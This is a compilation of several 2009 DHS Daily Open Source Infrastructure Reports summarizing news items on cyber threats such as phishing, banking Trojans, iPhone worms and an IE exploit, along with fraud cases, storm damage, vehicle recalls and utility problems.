Department of Homeland Security Daily Open Source Infrastructure Report

Monday, November 30, 2009

Complete DHS Daily Report for November 30, 2009

Daily Report

Top Stories

 DarkReading reports that researchers at Red Condor detected a new phishing attack that promises to enhance the security of the user’s emailbox and then downloads a banking Trojan instead. Red Condor says it has stopped more than 3.5 million messages belonging to the spam campaign, which was detected on November 20. (See item 46 in the Information Technology Sector below)


 According to the Associated Press, the Governor of New Jersey asked the President on November 25 to declare much of the Jersey shore a disaster area due to damages exceeding $49 million from a recent coastal storm. Tourism is New Jersey’s second-largest industry, accounting for nearly $39 billion a year, much of it from the shore. (See item 54)


54. November 25, Associated Press – (New Jersey) NJ Governor Corzine seeks Presidential declaration of disaster area for Jersey Shore. The Governor of New Jersey asked the President on November 25 to declare much of the Jersey shore a disaster area due to damage from a recent coastal storm. The Governor wrote that damages will exceed $49 million. He said emergency funds to restore beaches, dunes and structures are needed immediately to protect lives and homes from further winter storms now that many coastal areas are unprotected. “Beach erosion is extensive,” the letter stated. “Many of the beaches along our coast have been eroded to the point they offer little protection from future storms. The damages already sustained to the beaches and dunes will render New Jersey particularly vulnerable to these weather systems until restoration is completed.” The Governor also wrote that the beaches are a crucial part of the state and local economies. Tourism is New Jersey’s second-largest industry, accounting for nearly $39 billion a year, much of it from the shore. The storm, which lasted from November 11 to 15, caused extensive erosion in Cape May, Atlantic and Ocean counties. Roofs were blown off buildings, a key shore bridge was damaged and had to be closed when it was struck by a wayward barge, dunes were wiped out and entire communities flooded. Source: http://cbs3.com/local/New.Jersey.Governor.2.1334593.html


Details

Banking and Finance Sector

13. November 27, Lansing State Journal – (Michigan) Williamston man pleads guilty in Ponzi scheme. A 28-year-old Williamston man has pleaded guilty in federal court to running a $1.3 million Ponzi scheme, authorities said. According to the U.S. Attorney’s Office in Grand Rapids, the man admitted the week of November 23 that he set up a stock trading company, known as Kingdom First Trading, and solicited investors by promising returns higher than market rate. He consistently lost money in trading, but hid that from investors by e-mailing fake account statements that said they were earning sizable profits and accumulating large balances, authorities said. He took money from new investors to pay earlier investors. He also used that money for rent, automobiles and jewelry, authorities said. He will be sentenced on March 15, 2010 and faces up to 20 years in prison. He pleaded guilty Monday to wire fraud, according to court records. As part of the plea agreement, he must pay more than $1.31 million in restitution to the victims. Source: http://www.lansingstatejournal.com/article/20091127/NEWS01/311270006/1001/NEWS/Williamston-man-pleads-guilty-in-Ponzi-scheme


14. November 27, Wall Street Journal – (International) Technical glitch shuts London trade for hours. London Stock Exchange Group PLC (LSE) on November 26 was hit by a technical glitch, forcing it to suspend the trading of U.K. stocks for more than three hours. The exchange stopped trading of shares at 10:33 a.m. GMT (5:33 a.m. EST) after receiving reports that some stocks had “connectivity issues,” a spokesman said. Trading resumed at 2 p.m. GMT, but the cause of the problem was still being investigated. The glitch comes a day after the chief executive officer reiterated plans for the LSE to replace its TradeElect trading engine with a new, faster one. It also comes after another glitch earlier this month when 300 stocks could not be traded for an hour and a half before the market closed. An LSE spokesman said that “There were a number of connectivity issues this morning, so we placed all the order-driven securities into an auction period.” Source: http://online.wsj.com/article/SB10001424052748703499404574559372702658330.html?mod=rss_markets_main


15. November 23, WRTV 6 Indianapolis – (Indiana) Police: Skimmers take unsuspecting customers’ cash. Several suspected ATM skimming incidents have been reported in recent weeks in communities north of Indianapolis, prompting police to release a surveillance picture of one man believed to be involved. A Carmel police detective said the man pictured recently used a victim’s credit card to buy electronics at Fry’s Electronics on 96th Street in Fishers and a Best Buy store on Michigan Road in Carmel. He said he thinks the victim’s credit card may have been swiped and reproduced through a skimmer at an area gas station and that similar crimes have occurred recently in Fishers, Westfield, Noblesville, Lawrence and Indianapolis. “There have been several victims throughout Hamilton County, and that card information has been used everywhere from Avon to Muncie...down to Greenwood and a lot of places in between,” said the Carmel police lieutenant. Consumers should closely look at any device in which they are swiping a credit or debit card. Source: http://www.theindychannel.com/news/21698452/detail.html


16. November 23, The Register – (International) iPhone worm infects devices and redirecs Dutch online bank users to a phishing site. The second worm to infect jailbroken iPhone users reportedly targets customers of Dutch online bank ING Direct. Surfers visiting the site with infected devices are redirected to a phishing site designed to harvest online banking login details, the BBC reports. ING Direct told the BBC it planned to warn users’ of the attack via its website, as well as briefing front line call center staff on the threat. The chief research officer at F-Secure said the threat had in any case been neutralized. “It [the worm] was targeting ING. The websites it needed for this to work have now been taken down.” Anti-virus analysts, still in the process of analyzing the malware, caution that the attack is a bit more complex than simple phishing and seems to involve an attempt to snatch SMS messages associated with online banking transactions. Although the “Duh” or Ikee-B worm exploits the same SSH backdoor as the original Ikee worm, the latest malware is far more dangerous than its predecessor. Doh turns compromised devices into a botnet under the control of unidentified hackers. The Rickrolling ikee worm, by contrast, only changes users’ wallpaper to an image of a pop singer. As previously reported, compromised phones are left under the control of a botnet server in Lithuania. Duh changes the root password of compromised iPhones, allowing crooks to log into compromised units and carry out malicious further actions. A SophosLabs researcher used a password cracking tool to discover the malware changes iPhone root passwords from ‘alpine to ‘ohshit’. In addition to the two iPhone worms, an earlier hacking/extortion attack (targeting iPhone users in the Netherlands) also exploited the default password SSH backdoor on jailbroken iPhones. Security experts strongly advise users of jailbroken phones to change their passwords from ‘alpine’ immediately to avoid further attacks along the same lines. Source: http://cyberinsecure.com/iphone-worm-infects-devices-and-redirecs-dutch-online-bank-users-to-a-phishing-site/


For another story, see item 46 in the Information Technology Sector below


Information Technology


44. November 27, The Register – (International) Smut-ladened spam disguises WoW Trojan campaign. A malicious spam campaign that attempts to harvest online game passwords under the guise of messages containing smutty photos is doing the rounds. The tainted emails have subject lines such as “Do you like to find a girlfriend like me?”, and an attached archive file called “my photos.rar”. The supposed video files actually harbored video files and a password-stealing Trojan called Agent-LVF, which is designed to steal the login credentials of World of Warcraft gamers. Security firm Sophos reckons it is likely the stolen credentials and associated in-game assets will be sold through underground sites, earning hackers a tidy profit in the process. “A surprising amount of malware is designed to steal registration keys, passwords and data from players of computer games,” said a consultant at Sophos. “This isn’t just about doing better in a computer game. Criminals are stealing virtual assets like armour, money and weapons to trade for hard cash in the real world.” Source: http://www.theregister.co.uk/2009/11/27/wow_trojan_spam/


45. November 25, ComputerWorld Canada – (National) H1N1’s IT threats may not be taken seriously. It appears that the threat of an H1N1 outbreak has not prompted enterprises to re-evaluate their disaster recovery plans or better enable a mobile workforce, according to a new Cisco Systems Inc. study. The networking giant found that only 22 percent of survey respondents consider their remote-access infrastructure to be disaster-ready. The survey polled 500 IT security decision-makers at U.S. health-care, financial, retail, and public sector organizations last month. In addition, the reported indicated that 21 percent of respondents admitted to having no employees enabled to work remotely and 53 percent said that less than half of their employees are capable of working from home. The director of security solutions marketing at Cisco said many of these organizations will be the hardest hit in the event of a flu pandemic. But even less extreme circumstances, such as a major road closure or a winter storm, would probably have a noticeable impact on the business as well. Ensuring that all essential workers are enabled with remote-access capabilities is crucial, he added, to operating business as usual during unexpected events. Providing remote VPN connectivity back into the office might be enough for a mobile worker that just requires e-mail or a select few applications, but for employees who require real-time communication and full telephony capabilities, some investments should be made, he said. A security analyst at Fusepoint Managed Services Inc. said the first issues he would address as an IT security leader would be technology-related. “Do we have the tools and technologies in place for employees to be working remotely?” he said. “Do we have the bandwidth? Do we have the storage capability within our phone systems and e-mail servers to be able to queue two or more weeks of data from more than 40 percent of your missing staff?” Source: http://www.itworldcanada.com/news/h1n1s-it-threats-may-not-be-taken-seriously/139420


46. November 25, DarkReading – (International) New exploit masquerades as Flash Player upgrade. Researchers have detected a new phishing attack that promises to enhance the security of the user’s emailbox — and then downloads a malicious Trojan instead. The email requests that recipients click on a link in the body of the email to update the “security mode” of their emailboxes, according to researchers at Red Condor, an email security tool vendor. Users who click on the link are taken to a Website that advises them to update to the latest version of the Macromedia Flash Player by downloading “flashinstaller.exe.” This executable is actually a banking Trojan that is known to disable firewalls, steal sensitive financial data, and provide hackers with remote access capabilities, Red Condor says. The malware is more commonly known as Win32:Zbot-MGA (Avast), W32/Bifrost.C.gen!Eldorado (F-Prot), PWS-Zbot.gen.v (McAfee), or PWS:Win32/Zbot.gen!R (Microsoft), the researchers note. The spam campaign was detected late on November 20; within the first six hours, Red Condor says it blocked more than 500,000 email messages. So far, the company says it has stopped more than 3.5 million messages belonging to this campaign. Source: http://darkreading.com/security/attacks/showArticle.jhtml?articleID=221901213&cid=ref-true


47. November 25, eWeek – (International) Symantec Web site hack exposes user data. A hacker recently demonstrated how a SQL injection vulnerability in a Symantec Web site could be exploited to reveal user data. Symantec says the vulnerability only impacts customers in Japan and South Korea. A Web site operated by security firm Symantec was hacked — giving an attacker a sneak peak at sensitive customer data. The Romanian hacker known as Unu exploited a blind SQL injection problem to get his hands on clear-text passwords associated with customer records and other data. Unu used sqlmap and Pangolin to demonstrate the vulnerability, and published screenshots to his blog. According to Symantec, the vulnerability was on its pcd.symantec.com site, which is used to facilitate customer support for Symantec’s Norton products in Japan and South Korea. “At this time, we believe that this incident does not affect Symantec customers anywhere else in the world,” a Symantec spokesperson said November 24. “This incident impacts customer support in Japanand South Korea but does not affect the safety and usage of Symantec’s Norton-branded consumer products. Symantec is currently in the process of ensuring that the Website is appropriately secured and will bring it back online as soon as possible.” According to Unu, his goal was not to cause harm, but to create a stir so the problem would be fixed. A Trend Micro Advanced threats Researcher said sensitive data should never be stored in clear text and bounds checking of input data can help avoid buffer overflows and SQL injection attacks. Source: http://www.eweek.com/c/a/Security/Symantec-Website-Hack-Exposes-User-Data-639128/


48. November 25, IDG News Service – (International) Metasploit releases IE attack, but it’s unreliable. Developers of the open-source Metasploit penetration testing toolkit have released code that can compromise Microsoft’s Internet Explorer browser, but the software is not as reliable as first thought. The code exploits an Internet Explorer bug that was disclosed recently in a proof-of-concept attack posted to the Bugtraq mailing list. That first code was unreliable, but security experts worried that someone would soon develop a better version that would be adopted by cyber-criminals. The original attack used a “heap-spray” technique to exploit the vulnerability in IE. But for a while Wednesday, it looked as though the Metasploit team had released a more reliable exploit. They used a different technique to exploit the flaw, but Metasploit eventually pulled its code. Microsoft said via e-mail Wednesday afternoon that it was “currently unaware of any attacks in the wild using the exploit code or of any customer impact.” The two versions of the browser that are vulnerable to the flaw — IE 6 and IE 7 — are used by about 40 percent of Web surfers. The flaw lies in the way IE retrieves certain Cascading Style Sheet objects, used to create a standardized layout on Web pages. Concerned IE users can upgrade their browser or disable JavaScript to avoid an attack. Source: http://www.computerworld.com/s/article/9141485/Metasploit_releases_IE_attack_but_it_s_unreliable?taxonomyId=17


49. November 24, Forbes – (International) The year of the mega data breach. According to the Identity Theft Resource Center (ITRC), government agencies and businesses reported 435 breaches as of November 17, on track to show a 50 percent drop from the number of breaches reported in 2008. That would make 2009 the first year that the number of reported data breaches has dropped since 2005, when the ITRC started counting. But the decrease in data breaches is deceptive. In fact, the number of personal records that were exposed by hackers has skyrocketed to 220 million records so far this year, compared with 35 million in 2008. That represents the largest collection of lost data on record. “Why are organizations that have these massive amounts of our data still not encrypting it?” the ITRC director says. “When we know we have these super breaches going on, why are they resisting a technology that could prevent them?” Setting aside 2009’s two “super breaches” — Heartland Payment Systems and the National Archive and Records Administration — the ITRC only recorded around 14 million lost records this year, a comparatively small number. But the chief executive of the Ponemon Institute doubts that the ITRC accounting is complete. Ponemon does not believe the adoption of DLP and encryption is stemming the flood of personal data. He says those technologies are often implemented spottily and can not keep up with all the new places from which data can be stolen, from smart phones to Web collaboration tools. “We shouldn’t take false comfort in the idea that companies are doing a better job of this,” Ponemon says. “There’s no question that more companies are using DLP and encryption tools. But there’s always a human factor, and many people simply don’t take these technologies seriously.” Source: http://www.forbes.com/2009/11/24/security-hackers-data-technology-cio-network-breaches.html


For more stories, see item 16 in the Banking and Finance Sector above and 53 below in the Communications Sector


Communications Sector

50. November 27, Associated Press – (Iowa) Animal knocks out cable in eastern Iowa town. An animal chewed through a cable line, knocking out cable and Internet service to roughly 1,000 customers in an eastern Iowa town. The disruption occurred Thursday afternoon in Bellevue, near Dubuque. Officials say service is slowly being restored to subscribers of Bellevue’s municipal cable system. One official says cable and Internet service was restored by about 8:30 p.m Thursday, but that it is taking time to get all customers back on line. Source: http://www.kcautv.com/Global/story.asp?S=11579874


51. November 25, ZDNet – (National) DreamHost customers hit with nightmare. Hosting company DreamHost had trouble keeping its customer sites up and running as it migrates to a new data center. The problems began to appear on November 22 and were stretching almost into Thanksgiving. Customers reported that their sites were down for 24 hours at a clip and when there was a recovery it was not a reliable one. Among the problems are the following. DreamHost has been upgrading their shared hosting hardware. The upgrade went wrong. Customer support did not know what was going on. Source: http://blogs.zdnet.com/BTL/?p=27841


52. November 25, U.S. Environmental Protection Agency – (National) Verizon Wireless voluntarily discloses environmental violations. Verizon Wireless has agreed to pay a $468,600 civil penalty to settle self-disclosed violations of federal environmental regulations discovered at 655 facilities in 42 states. Verizon voluntarily entered into a corporate audit agreement with the U.S. Environmental Protection Agency and conducted environmental compliance audits at more than 25,000 facilities nation-wide. The Environmental Appeals Board at EPA has approved an administrative settlement resolving violations Verizon found through its compliance audits. Verizon audited facilities that include cell towers, mobile switch centers, call centers, and administrative offices. As a result of its audit, the company reported violations of clean water, clean air, and emergency planning and preparedness regulations to EPA. Verizon promptly corrected the violations found during its audit, which included preparing and implementing spill prevention, control, and countermeasure plans, applying for appropriate air permits, and submitting reports to state and local emergency planning and response organizations informing them of the presence of hazardous substances. Source: http://yosemite.epa.gov/opa/admpress.nsf/d0cf6618525a9efb85257359003fb69d/aa169813e7e6464085257679006910ef!OpenDocument


53. November 25, IDG News Service – (International) Redirecting DNS requests can harm the Internet, says ICANN. The Internet Corporation for Assigned Names and Numbers (ICANN) on Tuesday condemned the practice of redirecting Internet users to a third-party Web site or portal when they misspell a Web address and type a domain name that does not exist. Rather than return an error message for Domain Name System requests for nonexistent domains, some DNS operators send back the IP address of another domain, a process known as NXDOMAIN substitution. The target address is often a Web portal or information site. Handling DNS requests this way has a number drawbacks that could lead to the Internet not working properly, according to ICANN. For example, users sending e-mail to a domain that does not exist should get an immediate error message. However, if the message is redirected to a site set up to handle Web traffic, it is likely to get queued and an error message will not arrive for days, ICANN said. Also, users will get longer response times if the site to which they are supposed to be redirected goes down. Redirection sites are prime targets for attacks by hackers that want to send users to their own servers. There are also privacy issues, according to ICANN. If sensitive data is redirected via a country with a different jurisdiction and local law, there could be consequences for both users and registries, it said. ICANN published its opinions and findings in a draft memo before the introduction of new generic top-level domains (gTLDs). The organization discourages the practice of redirecting requests for nonexistent domains, and suggested banning it in a draft of the agreement owners of the new gTLDs would have to sign. ICANN wants domain owners wishing to redirect DNS requests to first explain why doing so will not cause any problems. Source: http://www.pcworld.com/article/183135/redirecting_dns_requests_can_harm_the_internet_says_icann.html


Department of Homeland Security Daily Open Source Infrastructure Report

Friday, November 27, 2009

Complete DHS Daily Report for November 27, 2009

Daily Report

Top Stories

 According to the Associated Press, Toyota Motor Corp. said on November 25 it will replace accelerator pedals on 3.8 million recalled vehicles in the United States to address problems with the pedals becoming jammed in the floor mat. As a temporary step, Toyota will have dealers shorten the length of the gas pedals beginning in January while the company develops replacement pedals for their vehicles, the Transportation Department and Toyota said. (See item 8)


8. November 25, Associated Press – (National) Toyota to replace 3.8 million gas pedals. Toyota Motor Corp. said on November 25 it will replace accelerator pedals on 3.8 million recalled vehicles in the United States to address problems with the pedals becoming jammed in the floor mat. As a temporary step, Toyota will have dealers shorten the length of the gas pedals beginning in January while the company develops replacement pedals for their vehicles, the Transportation Department and Toyota said. New pedals will be available beginning in April, and some vehicles will have brake override systems installed as a precaution. Toyota, the world’s largest automaker, announced the massive recall in late September and told owners to remove the driver’s side floor mats to prevent the gas pedal from potentially becoming jammed. Popular vehicles such as the Toyota Camry, the top-selling passenger car in America, and the Toyota Prius, the best-selling gas-electric hybrid, are part of the recall. It includes the 2007-10 model year Camry, 2005-10 Toyota Avalon, 2004-09 Prius, 2005-10 Toyota Tacoma, 2007-10 Toyota Tundra, 2007-10 Lexus ES350 and 2006-10 Lexus IS250/350. The recall involving the accelerators was Toyota’s largest in the U.S. It was prompted by a high-speed crash in August involving a 2009 Lexus ES350 that killed a California Highway Patrol officer and three members of his family near San Diego. The Lexus hit speeds exceeding 120 mph, struck a sport utility vehicle, launched off an embankment, rolled several times and burst into flames. To fix the problem, Toyota and the government said dealers will shorten the length of the accelerator pedal on the recalled vehicles and in some cases remove foam from beneath the carpeting near the pedal to increase the space between the pedal and the floor. They said owners of the ES350, Camry and Avalon would be the first to receive notification because the vehicles are believed to have the highest risk for pedal entrapment. Source: http://www.msnbc.msn.com/id/34145358/ns/business-autos/


 The IDG News Service reports that a 32-year-old California man has pleaded guilty on November 20 to charges that he sold thousands of counterfeit chips to the U.S. Navy. (See item 11)


11. November 24, IDG News Service – (National) Man pleads guilty to selling fake chips to US Navy. A 32-year-old California man has pleaded guilty to charges that he sold thousands of counterfeit chips to the U.S. Navy. In a plea agreement reached on Friday, a Newport Coast, California man pleaded guilty to conspiracy and counterfeit-goods trafficking for his role in an alleged chip-counterfeiting scam that ran between 2007 and 2009. The man, his wife, and her brother operated several microchip brokerage companies that imported chips from Shenzhen, in China’s Guangdong province. They would buy counterfeit chips from China or else take legitimate chips, sand off the brand markings and melt the plastic casings with acid to make them appear to be of higher quality or a different brand, the U.S. Department of Justice said in a press release. Source: http://www.computerworld.com/s/article/9141438/Man_pleads_guilty_to_selling_fake_chips_to_US_Navy


Details

Banking and Finance Sector

13. November 24, KTVB 7 Boise – (Idaho) Text message scam targeting bank customers. Nampa, Idaho, officers say a text message scam is circulating that claims to be an “emergency notification” concerning their bank account – and tries to get the victim to call a toll-free number. When someone calls, they are solicited for account information or charged an extreme amount of money for making the call itself. Police say that the latest round is targeting customers of Mountain Gem Credit Union. Police warn you to ignore the text, and not to give any information out unless you are sure where it is going. If you have questions, you are advised to call your local bank branch. Source: http://www.ktvb.com/news/Text-message-scam-targeting-bank-customers-72748877.html


14. November 24, DarkReading – (International) CSI annual report: financial fraud, malware on the increase. Malware and financial fraud were among the chief “growth threats” posed to businesses in 2009, according to a new study from the Computer Security Institute that will be published next week. CSI’s 14th annual security survey, which will be distributed in conjunction with a free December 1 Webcast, covers a wide range of issues related to security management, including current threats, data loss statistics, and trends in technology usage. Respondents reported big jumps in the incidence of financial fraud (19.5 percent, over 12 percent last year); malware infection (64.3 percent, over 50 percent last year); denials of service (29.2 percent, over 21 percent last year), password sniffing (17.3 percent, over 9 percent last year); and Web site defacement (13.5 percent, over 6 percent last year). The survey showed significant dips in wireless exploits (7.6 percent, down from 14 percent in 2008), and instant messaging abuse (7.6 percent, down from 21 percent). “The financial fraud was a major concern because the cost of those incidents is so high,” says Sara Peters, senior editor at CSI and author of this year’s report. Financial fraud costs enterprises approximately $450,000 per incident, according to the study. While financial fraud costs rose in 2009, average losses due to security incidents of all types are down this year — from $289,000 per respondent to $234,244 per respondent, CSI says. Those numbers are still higher than 2005 and 2006 figures. Twenty-five percent of respondents stated the majority of their financial losses in the past year were due to nonmalicious actions by insiders. Source: http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=221901046


Information Technology


27. November 24, Department of Justice – (Florida) Former United Way employee sentenced for damaging charity’s computer network. The acting United States attorney for the Southern District of Florida, and the Special Agent in Charge, Federal Bureau of Investigation, Miami Field Office, announced the sentencing of a defendant on charges of computer fraud. On November 24, a U.S. district court judge sentenced the defendant to 18 months’ imprisonment, to be followed by three years of supervised release. In addition, the Court ordered him to pay more than $50,000 in restitution. According to documents filed with the Court, the defendant was a former employee of United Way of Miami-Dade (“UWMD”). He was employed as a computer specialist from July to December 2007. Approximately one year after he left UWMD’s employ, the defendant accessed United Way’s network without authorization. He deleted numerous files from UWMD’s servers and disabled UWMD’s telephone voice mail system, which prevented callers from leaving messages for UWMD and prevented UWMD employees from accessing their voice mail accounts. The defendant pled guilty to computer fraud on September 16, 2009. Source: http://miami.fbi.gov/dojpressrel/pressrel09/mm112409.htm


28. November 24, GAO Info – (National) FBI puts cyber threats in perspective. The FBI considers the cyber threat against our nation to be one of the greatest concerns of the 21st century. Despite the enormous advantages of the Internet, U.S. networked systems have a gaping and widening hole in the security posture of both our private sector and government systems. An increasing array of sophisticated state and non-state actors have the capability to steal, alter or destroy our sensitive data and, in the worst of cases, to manipulate from afar the process control systems that are meant to ensure the proper functioning of portions of our critical infrastructure. Moreover, the number of actors with the ability to utilize computers for illegal, harmful, and possibly devastating purposes continues to rise. When assessing the extent of the cyber threat, the FBI considers both the sophistication and the intent of U.S. adversaries. The most sophisticated actors have the ability to alter our hardware and software along the global supply chain route, conduct remote intrusions into our networks, establish the physical and technical presence necessary to re-route and monitor our wireless communications, and plant dangerous insiders within our private sector and government organizations. The actors that currently have all of these capabilities - which is a finding that is distinct from whether and when they are using them - include multiple nation states and likely include some organized crime groups. The FBI has not yet seen a high level of end-to-end cyber sophistication within terrorist organizations. Still, the FBI is aware of and investigating individuals who are affiliated with or sympathetic to al-Qaeda who have recognized and discussed the vulnerabilities of the U.S. infrastructure to cyber attack, who have demonstrated an interest in elevating their computer hacking skills, and who are seeking more sophisticated capabilities from outside of their close-knit circles. Should terrorists obtain such capabilities, they will be matched with destructive and deadly intent. Source: http://www.govinfosecurity.com/articles.php?art_id=1962


For another story, see item 29 below


Communications Sector

29. November 24, IDG News Services – (International) Palm, Sprint pursue lost data from Pre, Pixi. Palm and Sprint are trying to solve problems some users have had moving data from one Palm webOS device to another, a task that has caused some to lose contacts and calendar entries, according to blogs and online user comments. Users of the Palm Pre and Pixi, the first two devices to run Palm’s webOS, can back up contacts, calendar entries, tasks and memos to an online Palm Profile. From that password-protected Web page, they can synchronize that data to another webOS device over the air if they have to change phones for any reason. Normally, one copy of that data resides on the handset and the other in the user’s Palm Profile on Palm’s servers. But some users who have had to replace or reset their webOS devices have found large amounts of their information missing and apparently irretrievable, according to a post last week on the Palm-oriented blog Pre Central. Several people posted comments on the item, describing data losses. Palm said in a statement it is working with Sprint to solve the problems those users are having. “We are seeing a small number of customers who have experienced issues transferring their Palm Profile information to another Palm webOS device,” the company said. “Palm and Sprint are working closely together to support these customers to successfully transfer their information to the new device.” It’s not the first glitch in online backup for mobile phones. Last month, many users of the T-Mobile Sidekick phone from Microsoft’s Danger division lost contacts, photos and other data permanently after a server failure. The incidents could raise concerns among consumers about relying on network-based synchronization instead of backing up data to their own PCs or Macs. Source: http://www.computerworld.com/s/article/9141461/Palm_Sprint_pursue_lost_data_from_Pre_Pixi

Department of Homeland Security Daily Open Source Infrastructure Report

Wednesday, November 25, 2009

Complete DHS Daily Report for November 25, 2009

Daily Report

Top Stories

 According to the San Francisco Examiner, water officials are rushing to repair a massive pipe, one of the two pipes that carry drinking water into an out-of-service reservoir, to ensure the eastern half of San Francisco continues to have clean water. (See item 18)


18. November 24, San Francisco Examiner – (California) Half of the city in danger of losing water. Water officials are rushing to repair a massive pipe to ensure the eastern half of San Francisco continues to have clean water. With one of the two pipes that carry drinking water into an out-of-service reservoir, the San Francisco Public Utilities Commission, which handles water distribution, is rushing to make the repairs, lest anything damage the second pipe. Joints between steel pipes laid in recent decades inside a tunnel 40 feet underground were found to be corroded late last month after leaking water flooded Tioga Avenue in the Visitacion Valley neighborhood. The corroded, 36-inch pipe, called Crystal Springs 1, is one of two built to carry Hetch Hetchy Valley snowmelt north from the Crystal Springs Reservoir on the Peninsula into the University Mound Reservoir in San Francisco. The water is then stored and distributed to the eastern half of the city, including downtown. All the water that had been carried by the pipe is now being fed through Crystal Springs 2, a 60-inch pipe that runs roughly parallel to the older pipe. It is not known when Crystal Springs 1 began leaking, but 2,200 feet of piping was shut down after the leaks were detected last month, preventing any water from flowing through. If Crystal Springs 2 fails because of old age or due to an earthquake before Crystal Springs 1 is repaired, the University Mound Reservoir could run dry within two days, according to the Public Utilities Commission water manager. The reservoir is one of two major ones in the city. If such a scenario unfolds, utility workers would have to frantically attempt to reroute the water network to continue providing water for eastern and downtown San Francisco. “If [Crystal Springs] 2 went out for some reason, we would really be hard-pressed to deliver water,” the water manager said. “Our plumbers would have to work miracles.” The Public Utilities Commission is not equipped to repair the corroded pipe, agency documents show. Repair work by A. Ruiz Construction is expected to last until the end of December, agency documents show. Source: http://www.sfexaminer.com/local/Half-of-The-City-in-danger-of-losing-water-72191267.html


 The Register reported that a bug in Microsoft’s Internet Explorer browser is causing more than 50 million files stored online to leak potentially sensitive information that could compromise user privacy, a security researcher said. (See item 28 in the Information Technology Sector below)


Details

Banking and Finance Sector

9. November 24, CNN – (National) Bank ‘problem’ list climbs to 552. Despite the frenetic pace of bank failures this year, 552 banks are still at risk of going under, according to a government report published Tuesday. The Federal Deposit Insurance Corp. (FDIC) said that the number of lenders on its so-called problem list climbed to its highest level since the end of 1993. At that time, the agency red-flagged 575 banks. Mounting bank failures have proven costly for the FDIC, an agency created to cover the deposits of consumers and businesses in the event that a bank is shut down. On Tuesday, the agency revealed its deposit insurance fund slipped into the red for the first time since 1991. At the end of the quarter on September 30, the value of the fund was $8.2 billion in the hole. But that number accounts for $21.7 billion the agency has set aside in anticipation of future bank failures. The ongoing recession has already claimed 124 banks this year. But fears persist that the number will multiply in coming years because banks are still taking losses on mortgage-related loans and face growing problems with commercial real estate. The banks that end up on the problem list are considered the most likely to fail because of difficulties with their finances, operations or management. Still, history has shown just 13% of banks on the list have failed on average. Source: http://money.cnn.com/2009/11/24/news/companies/fdic_list/index.htm


10. November 23, WFAA 8 Dallas-Fort Worth – (National) Electronic pickpocketing threatens credit cards, passports. Thousands of travelers and consumers can fall victim to electronic pickpocketing and never even know it because they carry new credit cards and U.S. passports. Credit card issuers, along with the U.S. State Department, have begun installing radio frequency identification (RFID) chips in credit cards and passports because the technology holds more data than magnetic stripes and can be read quicker. But, that convenience, experts warn, can also put people at risk of having their information taken. RFID chips are commonly found in cards used to raise gates in parking garages and unlock doors at businesses. All one has to do is simply swipe the card in front of a reader. Within the last few years, that same technology has been introduced to credit cards and U.S. passports, potentially putting holders at risk. It does not matter if the cards are kept in a wallet or a purse since they can transmit through them when prompted by a RFID reader, which are for sale on eBay. Using free software, hackers using a RFID reader can easily obtain account numbers and expiration dates simply by placing the reader within a few inches of the card. The only credit cards that are vulnerable are those that allow users to tap or pass a reader to pay rather than swiping. Some might also have a symbol on them that indicate they transmit. Source: http://www.wfaa.com/home/Electronic-pick-pocketing-threatens-credit-cards-passports-72070657.html


11. November 23, DarkReading – (International) Employees willing to steal data; companies on the alert. Employees know it is illegal to steal company data, but they are prepared to do it anyway. Companies know their employees are a chief threat to their data, but most are not doing much about it. These are the takeaways from two separate studies published today by security vendors Cyber-Ark and Actimize. Taken together, the studies paint a sobering picture of the state of trust and security within the corporate walls. In its study, Cyber-Ark surveyed some 600 workers in the financial districts of New York and London and found that most workers are not shy about taking work home — and keeping it for their own use. Eighty-five percent of the respondents to the Cyber-Ark survey said they know it is illegal to download company data for personal use, but 41 percent said they already have taken sensitive data with them to a new position. About a third of respondents said they would share sensitive information with friends or family in order to help them land a job. Almost half of the respondents (48 percent) admitted if they were fired tomorrow they would take company information with them, Cyber-Ark says. Thirty-nine percent of people would download company/competitive information if they got wind that their job were at risk. A quarter of workers said the recession has made them feel less loyal toward their employers. Of those who plan to take competitive or sensitive corporate data, 64 percent said they would do so “just in case” the data might prove useful or advantageous in the future. Twenty-seven percent said they would use the data to negotiate their new position, while 20 percent plan to use it as a tool in their new job. Customer and contact lists were the top priority for employees to steal, registering 29 percent of the respondents. Plans and proposals were next (18 percent), with product information bringing up the rear (11 percent). Thirteen percent of savvy thieves said they would take access and password codes so they could get into the network once they have left the company and continue downloading information and accessing data. Source: http://www.darkreading.com/insiderthreat/security/management/showArticle.jhtml?articleID=221900815


Information Technology


27. November 24, IDG News Services – (International) Microsoft issues security advisory on IE vulnerability. Microsoft on November 23 issued a security advisory that provides customers with guidance and workarounds for dealing with a zero-day exploit aimed at Internet Explorer. Earlier in the day, the company said it was investigating the incident which emerged over the weekend when someone published the exploit code to the Bugtraq mailing list. By Monday night, Microsoft switched gears and issued the advisory. There have not been any active exploits of the vulnerability reported so far. Microsoft released Security Advisory 977981, which includes workarounds for an issue that exposes a flaw in Cascading Style Sheets that could allow for remote code execution. Vulnerabilities that allow remote-code execution generally result in patches rated as critical by Microsoft. The advisory confirmed the vulnerability affects IE 6 on Windows 2000 Service Pack 4, and IE 6 and IE 7 on supported editions of XP, Vista, Windows Server 2003 and Windows Server 2008. Microsoft’s said users running IE 7 on Vista can configure the browser to run in Protected Mode to limit the impact of the vulnerability. It also recommended setting the Internet zone security setting to “High” to protect against the exploit. The “High” setting will disable JavaScript, which currently is the only confirmed attack mode. Microsoft said IE 5.01 Service Pack 4 and IE 8 on all supported versions of Windows are not affected. For an attack to work, the hacker would first have to get his victim to visit a Web site that hosted the exploit code. This could be a malicious Web site set up by the hacker himself or it could be a site that allows users to upload content. Another way cyber criminals have launched this type of attack, however, is by hacking into legitimate Web sites. Earlier this week, for example citizen’s band radio vendor Cobra Electronics disclosed that it had been hacked in June, most likely by a professional hacker who had used the site to download malware to customers. Source: http://www.computerworld.com/s/article/9141378/Microsoft_issues_security_advisory_on_IE_vulnerability


